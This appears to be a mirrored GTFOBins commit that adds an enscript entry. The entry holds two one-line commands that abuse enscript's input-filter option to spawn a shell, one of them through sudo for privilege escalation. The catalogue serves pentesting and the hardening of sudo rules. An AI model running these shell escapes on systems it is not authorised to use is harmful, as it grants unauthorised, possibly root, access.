1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add enscript

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Lucien A 2023-11-20 23:08:57 +01:00 committed by GitHub
parent 1d2353ad30
commit 8d683fbec4
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

7
_gtfobins/enscript.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
shell:
- code: enscript /dev/null -qo /dev/null -I '/bin/sh >&2'
sudo:
- code: sudo enscript /dev/null -qo /dev/null -I '/bin/sh >&2'
---